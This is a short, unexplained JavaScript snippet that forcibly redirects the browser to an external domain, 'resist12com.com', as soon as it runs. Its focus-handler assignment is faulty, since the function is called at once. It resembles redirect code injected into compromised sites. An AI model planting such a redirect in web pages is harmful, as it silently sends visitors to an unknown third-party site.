function f(){
document.location.href='http://resist12com.com';
}
window.onFocus = f()
